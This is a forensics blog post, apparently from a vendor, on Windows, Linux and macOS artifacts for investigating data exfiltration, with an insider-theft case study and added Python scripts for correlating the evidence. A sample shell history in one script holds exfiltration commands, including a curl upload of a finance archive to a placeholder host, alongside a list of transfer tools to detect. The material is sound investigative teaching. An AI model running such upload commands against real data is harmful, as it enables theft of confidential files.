
Investigating data exfiltration: key digital artifacts across Windows, Linux, and macOS

Data exfiltration—the unauthorized transfer of data from a system—can result in severe damage to organizations, making it critical for forensic investigators to identify key digital artifacts that reveal how, when, and where the breach occurred.

Tools such as Magnet Axiom Cyber, Magnet Axiom, and Magnet Nexus are essential in uncovering these critical pieces of evidence. These platforms allow investigators to efficiently search across devices, network logs, and cloud-based platforms, ensuring that no evidence is overlooked.

In this blog, we’ll discuss the key artifacts for investigating data exfiltration on Windows, Linux, and macOS systems. We’ll also present an example case to illustrate how these artifacts can be combined to “solve” a real-world exfiltration incident.

Key digital artifacts to examine in data exfiltration cases

1. Windows artifacts

Windows is often the primary target for data exfiltration, and several critical artifacts can provide valuable insights during an investigation.

Event logs (Windows Event Viewer)

  • Event logs are essential for tracking user activity and system processes. Key logs to analyze include:
    • Security logs (Logon/Logoff events)
    • File System Audit logs (Modifications to files, folder access)
    • PowerShell logs (Script execution, which might be used in data exfiltration)
    • Network logs (Connections to suspicious external servers)

Prefetch files

  • Prefetch files provide insight into the execution of programs, particularly if an exfiltration tool was used (e.g., FTP clients, cloud sync tools). These files can tell when an application was executed and how often.

Shimcache (Application Compatibility Cache)

  • This artifact stores information about executables that have been run on the system, even if the file has been deleted. Investigators can use this to trace the usage of data exfiltration tools.

Browser artifacts

  • If data exfiltration occurred via the web, browser artifacts such as history, cookies, download logs, and cache can provide insight into the websites visited and files uploaded to cloud services or suspicious domains.
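To make the browser point concrete, here is an added example (not code from the post or from Magnet) that reads a Chromium-style History database: it converts the WebKit timestamps (microseconds since 1601-01-01) that Chrome, Edge and other Chromium browsers store, and lists visits to a watchlist of cloud-storage hosts inside the incident window. The table is a reduced version of the real urls table, the rows and the host watchlist are constructed, and the database is built in memory so the script runs offline.

```python
"""List visits to cloud-storage hosts in a Chromium-style History database.

Added example, not code from the post or from Magnet. Chromium keeps page
visits in SQLite with timestamps counted in microseconds since 1601-01-01
(the WebKit epoch). The table below is a reduced copy of the real 'urls'
table and the rows are constructed.
"""
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed watchlist; a real case would use the examiner's own list
CLOUD_STORAGE_HOSTS = {"drive.google.com", "www.dropbox.com", "mega.nz", "wetransfer.com"}


def to_webkit(dt):
    """Aware datetime -> WebKit microseconds (integer arithmetic, no float rounding)."""
    return (dt - WEBKIT_EPOCH) // timedelta(microseconds=1)


def from_webkit(value):
    """WebKit microseconds -> aware UTC datetime."""
    return WEBKIT_EPOCH + timedelta(microseconds=value)


def build_sample_db():
    """In-memory stand-in for the History file, populated with constructed visits."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT, "
                "visit_count INTEGER, last_visit_time INTEGER)")
    rows = [
        ("https://intranet.example/finance/reports", "Finance reports", 14,
         datetime(2024, 3, 11, 18, 5, tzinfo=timezone.utc)),
        ("https://www.dropbox.com/home/uploads", "Dropbox - Files", 3,
         datetime(2024, 3, 11, 23, 40, tzinfo=timezone.utc)),
        ("https://competitor.example/careers", "Careers", 1,
         datetime(2024, 3, 11, 23, 52, tzinfo=timezone.utc)),
        ("https://mega.nz/fm", "MEGA", 1,
         datetime(2024, 3, 12, 0, 3, tzinfo=timezone.utc)),
        ("https://www.dropbox.com/home", "Dropbox", 9,
         datetime(2024, 2, 2, 9, 0, tzinfo=timezone.utc)),   # well before the incident
    ]
    con.executemany(
        "INSERT INTO urls (url, title, visit_count, last_visit_time) VALUES (?, ?, ?, ?)",
        [(u, t, c, to_webkit(d)) for u, t, c, d in rows])
    return con


def cloud_visits(con, start_iso, end_iso):
    """Visits to watched hosts whose last_visit_time lies in [start, end), newest first.
    The bounds are ISO-8601 strings with an offset, e.g. '2024-03-11T22:00:00+00:00'."""
    start, end = datetime.fromisoformat(start_iso), datetime.fromisoformat(end_iso)
    query = ("SELECT url, visit_count, last_visit_time FROM urls "
             "WHERE last_visit_time >= ? AND last_visit_time < ? "
             "ORDER BY last_visit_time DESC")
    hits = []
    for url, count, ts in con.execute(query, (to_webkit(start), to_webkit(end))):
        host = urlparse(url).hostname
        if host in CLOUD_STORAGE_HOSTS:
            hits.append((from_webkit(ts).isoformat(), host, url, count))
    return hits


if __name__ == "__main__":
    for row in cloud_visits(build_sample_db(),
                            "2024-03-11T22:00:00+00:00", "2024-03-12T03:00:00+00:00"):
        print(*row, sep="  |  ")
```

On a real case the same query runs against a copy of the History file (the live one is locked while the browser is open); the timestamp conversion is the part examiners most often get wrong, which is why to_webkit and from_webkit are kept as separate, testable functions.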

USB device history

  • Artifacts related to USB activity can be found in the Windows Registry (e.g., SYSTEM\CurrentControlSet\Enum\USBSTOR). These can reveal if an external storage device was connected, potentially used for data exfiltration.

SRUM (System Resource Usage Monitor)

  • SRUM is an invaluable artifact for data exfiltration forensics. It is a database located at C:\Windows\System32\sru\srudb.dat, and it tracks extensive details about system resource usage, including network activity, application usage, and data consumption. SRUM can reveal the amount of data sent and received by specific processes, helping investigators identify suspicious applications or network usage patterns indicative of data exfiltration.
    • For instance, if an unknown process was observed consuming significant network bandwidth during the time of the breach, SRUM could provide detailed information about the amount of data sent, which IP addresses were involved, and whether this data usage correlates with other suspicious events (such as USB device connections or FTP activity). This is particularly useful when the data exfiltration involved large data transfers that might have been missed in traditional network logs.
    • SRUM also tracks resource consumption by background processes, which might include stealthy exfiltration tools designed to operate silently. Investigators can use SRUM data to correlate network activity with applications running at the time of exfiltration, providing a detailed timeline of the breach.
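As an added illustration of the SRUM correlation described above (this is not code from the post or from Magnet), the script below takes per-application network usage rows in the shape of SRUM's network usage table and flags applications whose upload volume inside the incident window is far above their own busiest interval outside it. The rows are constructed; extracting them from srudb.dat (an ESE database) is assumed to have been done with a forensic tool and is not shown.

```python
"""Flag applications with an unusual upload burst in SRUM-style network usage data.

Added example, not code from the post or from Magnet. SRUM's network usage
table records per-application byte counts at roughly hourly intervals; the
rows below are constructed in that shape, as if already extracted from
srudb.dat (an ESE database, not parsed here).
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample rows: (interval timestamp, application, bytes sent, bytes received)
SRUM_ROWS = [
    ("2024-03-11T22:00:00", "outlook.exe",       1_200_000,  9_000_000),
    ("2024-03-11T23:00:00", "outlook.exe",         900_000,  7_500_000),
    ("2024-03-12T00:00:00", "onedrive.exe",        400_000,    300_000),
    ("2024-03-12T01:00:00", "onedrive.exe",        350_000,    280_000),
    ("2024-03-12T02:00:00", "ftpclient.exe", 2_100_000_000,     40_000),  # the burst
    ("2024-03-12T02:00:00", "onedrive.exe",        380_000,    290_000),
    ("2024-03-12T03:00:00", "ftpclient.exe",          5_000,      3_000),
    ("2024-03-12T09:00:00", "outlook.exe",       1_100_000,  8_800_000),
]

# Window around the suspicious activity (constructed to match the rows above)
SUSPECT_WINDOW = (datetime(2024, 3, 12, 1, 30), datetime(2024, 3, 12, 2, 30))


def parse_rows(rows):
    """Turn the ISO timestamps into datetimes; everything else passes through."""
    return [(datetime.fromisoformat(ts), app, sent, recv) for ts, app, sent, recv in rows]


def bytes_sent_by_app(rows, start, end):
    """Total bytes sent per application for intervals stamped in [start, end)."""
    totals = defaultdict(int)
    for ts, app, sent, _recv in parse_rows(rows):
        if start <= ts < end:
            totals[app] += sent
    return dict(totals)


def flag_upload_bursts(rows, start, end, min_bytes=100_000_000, factor=10):
    """Applications whose upload volume inside the window is at least min_bytes
    and more than `factor` times their busiest single interval outside it.
    An app with no rows outside the window (a first-seen tool) has a baseline
    of zero and is flagged on volume alone.
    Returns (app, bytes inside window, busiest outside interval), largest first."""
    inside = defaultdict(int)
    outside_peak = defaultdict(int)
    for ts, app, sent, _recv in parse_rows(rows):
        if start <= ts < end:
            inside[app] += sent
        else:
            outside_peak[app] = max(outside_peak[app], sent)
    flagged = [(app, total, outside_peak.get(app, 0))
               for app, total in inside.items()
               if total >= min_bytes and total > factor * outside_peak.get(app, 0)]
    flagged.sort(key=lambda row: row[1], reverse=True)
    return flagged


if __name__ == "__main__":
    for app, total, peak in flag_upload_bursts(SRUM_ROWS, *SUSPECT_WINDOW):
        print(f"{app}: {total:,} bytes sent in window (busiest other interval {peak:,})")
```

SRUM writes its intervals at roughly hourly granularity, so widen the window by one interval on each side when the exact timing of the burst is uncertain; the flagged application and its interval are then the anchor for checking Prefetch, USB history and the Event Logs for the same period.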

2. Linux artifacts

Linux systems require a slightly different approach, but they also hold valuable artifacts for tracing data exfiltration.

Shell history files

  • Shell history (~/.bash_history, ~/.zsh_history, etc.) tracks user command-line input, potentially revealing commands used to transfer data (e.g., scp, rsync, curl, or wget).

Auth logs

  • Authentication logs (typically found in /var/log/auth.log or /var/log/secure) provide details about user logins, privilege escalation, and SSH connections—crucial for identifying the vector of an external data transfer.
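The shell-history and auth-log points above combine naturally, so here is an added example (not code from the post or from Magnet) that parses constructed auth.log lines and a constructed ~/.bash_history written with HISTTIMEFORMAT set (each command preceded by a "#<epoch>" line), picks out the transfer commands the post names (scp, rsync, curl, wget; sftp is added as an assumption), and reports which SSH session, if any, each one ran inside. Host names, user names and addresses are placeholders; the year for the auth.log lines (which carry none) is supplied by the caller and assumed to be UTC.

```python
"""Correlate transfer commands in a shell history with SSH sessions from auth.log.

Added example, not part of the original post. Both inputs are constructed
samples: one in the shape of /var/log/auth.log (syslog format, no year) and
one in the shape of a ~/.bash_history written with HISTTIMEFORMAT set.
"""
import re
from datetime import datetime, timezone

AUTH_LOG = """\
Mar 12 01:12:03 fileserver sshd[2143]: Accepted publickey for jdoe from 10.0.5.23 port 51822 ssh2: ED25519 SHA256:PLACEHOLDERFINGERPRINT
Mar 12 01:12:03 fileserver sshd[2143]: pam_unix(sshd:session): session opened for user jdoe(uid=1001) by (uid=0)
Mar 12 01:40:10 fileserver sshd[2143]: Disconnected from user jdoe 10.0.5.23 port 51822
Mar 12 09:02:44 fileserver sshd[3301]: Accepted password for svc_backup from 10.0.0.9 port 40112 ssh2
"""

# jdoe's history; epoch markers correspond to 01:12:03, 01:13:31, 01:15:00 and 02:05:00 UTC on 2024-03-12
BASH_HISTORY = """\
#1710205923
ls -la /srv/finance
#1710206011
scp -r /srv/finance/q4 jdoe@10.0.5.23:/tmp/q4
#1710206100
tar czf /tmp/fin.tgz /srv/finance
#1710209100
curl -T /tmp/fin.tgz https://transfer.example/upload
"""

# Commands the post names as typical transfer tooling, plus sftp (assumption)
TRANSFER_CMDS = {"scp", "rsync", "curl", "wget", "sftp"}

ACCEPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")
DISC_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Disconnected from user (?P<user>\S+) (?P<ip>\S+) port \d+")


def syslog_time(stamp, year):
    """auth.log lines carry no year, so the examiner supplies it (assumed UTC here)."""
    stamp = re.sub(r"\s+", " ", stamp)
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)


def parse_sessions(text, year):
    """SSH sessions as dicts {user, ip, start, end}; end is None if never closed in the log."""
    sessions = []
    for line in text.splitlines():
        m = ACCEPT_RE.match(line)
        if m:
            sessions.append({"user": m["user"], "ip": m["ip"],
                             "start": syslog_time(m["ts"], year), "end": None})
            continue
        m = DISC_RE.match(line)
        if m:
            # close the most recent still-open session for this user/ip pair
            for s in reversed(sessions):
                if s["user"] == m["user"] and s["ip"] == m["ip"] and s["end"] is None:
                    s["end"] = syslog_time(m["ts"], year)
                    break
    return sessions


def parse_history(text):
    """Pair each '#<epoch>' marker with the command that follows it (None if no marker)."""
    entries, stamp = [], None
    for line in text.splitlines():
        if re.fullmatch(r"#\d+", line):
            stamp = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
        elif line.strip():
            entries.append((stamp, line.strip()))
            stamp = None
    return entries


def is_transfer(cmd):
    tokens = cmd.split()
    if tokens and tokens[0] == "sudo":   # look past the privilege wrapper
        tokens = tokens[1:]
    return bool(tokens) and tokens[0] in TRANSFER_CMDS


def correlate(history, sessions, user):
    """For each transfer command in the user's history, name the SSH session it ran in."""
    findings = []
    for ts, cmd in history:
        if not is_transfer(cmd):
            continue
        origin = "no SSH session in auth.log"
        if ts is not None:
            for s in sessions:
                if s["user"] == user and s["start"] <= ts and (s["end"] is None or ts <= s["end"]):
                    origin = f"ssh from {s['ip']}"
                    break
        findings.append((ts.isoformat() if ts else "unknown time", cmd, origin))
    return findings


if __name__ == "__main__":
    for row in correlate(parse_history(BASH_HISTORY), parse_sessions(AUTH_LOG, 2024), "jdoe"):
        print(*row, sep="  |  ")
```

A transfer command with no enclosing SSH session deserves a second look: it was run from a local console, from a session whose login fell outside the retained log, or the history timestamps have been altered. Without HISTTIMEFORMAT the history has no timestamps at all and only the command order survives, which the parser reports as an unknown time.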

Network logs

  • Network logs such as /var/log/syslog or /var/log/messages may reveal outbound connections. Investigators should look for abnormal outbound traffic to unknown IP addresses, especially over protocols commonly used for data exfiltration such as FTP or HTTP.

File System Timestamps (MAC times)

  • On Linux, file system timestamps (MAC times: Modified, Accessed, and Changed) for key directories (e.g., /home, /etc) can help identify when data was accessed or transferred.

Installed packages and running services

  • Logs and configuration files in /var/log/apt/history.log (Debian-based) or /var/log/yum.log (RHEL-based) provide insights into any tools or packages installed that could facilitate data exfiltration.

3. macOS artifacts

macOS, while less common in enterprise environments, is increasingly targeted in data breaches. Key macOS artifacts to examine include:

Unified logs

  • macOS Unified logs contain detailed system activity information, capturing processes, network connections, and user interactions, which are valuable for data exfiltration forensics.

System Integrity Protection (SIP) logs

  • SIP logs may show attempts to disable protection mechanisms to allow malicious activity, including data exfiltration.

Keychain Access logs

  • Investigators should check the Keychain Access logs to see whether credentials or other sensitive information were accessed. This could indicate that data was exfiltrated via compromised credentials.

Application usage data

  • macOS tracks app launches and usage history in databases located at /var/db/diagnostics. This can be critical for tracing whether and when a suspicious app or browser was used for exfiltration.

External storage devices

  • macOS stores logs for external storage devices, which can reveal if a USB drive or another external device was used for data exfiltration. The system.log and fseventsd logs can help correlate the timing of such activities.
    • One entry in the Unified logs shows the volume name and mount time (example entry omitted).

Example case: solving a data exfiltration incident

Scenario:

A mid-sized company suspects an insider exfiltrated sensitive data to a competitor. The initial tip came when unusual network activity was observed late at night, followed by the disappearance of a large set of financial documents. The system under investigation is a Windows workstation with access to the company’s internal file server.

Investigation process:

Step 1: Analyze network logs (Windows Event Logs)
Investigators begin by reviewing the Windows Event Logs, specifically looking at network activity logs during the time of the suspected breach. They discover multiple connections to an unfamiliar external IP address around 2:00 AM.

Step 2: Check USB device history (Windows Registry)
In the Windows Registry, the forensic team checks for USB activity. The registry entries reveal that a USB device was connected to the workstation just before the suspicious network activity. The connected device had previously been seen on the same employee’s laptop.

Step 3: Inspect prefetch files (Windows Prefetch)
The Prefetch files show that an FTP client was launched for the first time around the time of the breach. This leads investigators to suspect the FTP client was used to upload data externally.

Step 4: Examine file access logs (File System MAC times)
By analyzing the MAC times of key directories, investigators confirm that the sensitive financial documents were accessed a few minutes before the USB device was connected and the FTP client was launched.

Step 5: Inspect shell history (Linux Servers)
Since the financial documents are hosted on a Linux file server, investigators inspect the shell history and authentication logs. They find evidence of an SCP command issued from the same user account, transferring files from the server to the workstation earlier that night.

Step 6: Review browser history (Windows Artifacts)
The browser history on the employee’s workstation shows visits to a competitor’s website, alongside uploads via a cloud storage service the night before the FTP transfer.

Outcome:

Based on the forensic analysis, the investigators piece together the timeline:

  • The employee accessed sensitive documents on the Linux server using SCP.
  • They copied the files to a USB device on their workstation.
  • An FTP client was then used to upload these files to an external IP address linked to a competitor.
  • Further analysis of browser history shows additional data was uploaded to a cloud storage service the day before the FTP transfer, solidifying the case of data exfiltration.
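The outcome above is in effect a super timeline assembled from several artifacts. As an added example (not code from the post or from Magnet), the script below merges constructed per-artifact findings that mirror the case into one sorted timeline, searches it for the ordered chain (server copy, document access, USB connection, FTP client first run, outbound connection) within a bounded span, and reports which stages are still missing from a given window. Times, the device serial and the external address (203.0.113.10, from a documentation range) are placeholders.

```python
"""Merge findings from several artifacts into one timeline and test for the
exfiltration chain the case study describes.

Added example, not code from the post or from Magnet. The events are
constructed to mirror the case; times, device ids and the external address
are placeholders.
"""
from collections import namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "time source category detail")

# Constructed per-artifact findings, deliberately not in time order
RAW_EVENTS = [
    ("2024-03-12T01:58:30", "windows event log",   "external_connect", "outbound to 203.0.113.10:21"),
    ("2024-03-12T01:27:00", "prefetch",            "ftp_first_run",    "FTPCLIENT.EXE run count 1"),
    ("2024-03-05T08:10:00", "registry usbstor",    "usb_connect",      "Disk&Ven_PLACEHOLDER serial 0001 (a week earlier)"),
    ("2024-03-12T01:20:12", "ntfs mac times",      "doc_access",       "Q4_forecast.xlsx accessed"),
    ("2024-03-12T01:13:31", "linux shell history", "server_copy",      "scp -r /srv/finance/q4 to workstation"),
    ("2024-03-12T01:25:05", "registry usbstor",    "usb_connect",      "Disk&Ven_PLACEHOLDER serial 0123"),
    ("2024-03-12T01:20:40", "ntfs mac times",      "doc_access",       "Board_pack.pdf accessed"),
]

# The sequence the investigators expect to see, in order
EXFIL_CHAIN = ["server_copy", "doc_access", "usb_connect", "ftp_first_run", "external_connect"]


def build_timeline(raw):
    """Normalise raw tuples to Event records sorted by time (the 'super timeline')."""
    events = (Event(datetime.fromisoformat(t), s, c, d) for t, s, c, d in raw)
    return sorted(events, key=lambda e: e.time)


def find_chain(timeline, chain, max_minutes):
    """First in-order occurrence of every stage in `chain` whose first and last
    events lie within max_minutes of each other, or None if there is none."""
    for i, first in enumerate(timeline):
        if first.category != chain[0]:
            continue
        matched, pos = [first], i + 1
        for stage in chain[1:]:
            while pos < len(timeline) and timeline[pos].category != stage:
                pos += 1
            if pos == len(timeline):
                break
            matched.append(timeline[pos])
            pos += 1
        if (len(matched) == len(chain)
                and matched[-1].time - matched[0].time <= timedelta(minutes=max_minutes)):
            return matched
    return None


def missing_stages(timeline, chain, start_iso, end_iso):
    """Stages with no event inside [start, end]: tells the examiner which
    artifact still needs to be collected or re-examined for that window."""
    start, end = datetime.fromisoformat(start_iso), datetime.fromisoformat(end_iso)
    seen = {e.category for e in timeline if start <= e.time <= end}
    return [stage for stage in chain if stage not in seen]


if __name__ == "__main__":
    timeline = build_timeline(RAW_EVENTS)
    for e in timeline:
        print(e.time.isoformat(), e.source, e.category, e.detail, sep="  |  ")
    chain = find_chain(timeline, EXFIL_CHAIN, 120)
    print("chain found:", bool(chain))
    print("missing before 01:30:", missing_stages(timeline, EXFIL_CHAIN,
                                                  "2024-03-12T01:00:00", "2024-03-12T01:30:00"))
```

The decoy USB connection a week earlier shows why the span bound matters: USBSTOR entries persist long after a device was last used, so a device hit is only corroborating evidence when it sits between the other events of the chain.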

Investigating data exfiltration with key artifacts

Investigating data exfiltration requires carefully examining specific artifacts depending on the operating system in use. Windows, Linux, and macOS each provide unique forensic traces that can reveal the timeline of the breach.

With the help of specialized data exfiltration tools such as Magnet Axiom Cyber, Magnet Axiom, and Magnet Nexus, investigators can efficiently parse and analyze vast amounts of data from multiple sources—including cloud storage, endpoint devices, and external drives. These tools allow examiners to focus on the most critical artifacts and assemble a cohesive narrative of the data exfiltration, from initial access to final data transfer.

Understanding how to leverage these data exfiltration tools, combined with knowledge of key digital artifacts, will enable forensic examiners to build solid cases and respond swiftly to data theft incidents.
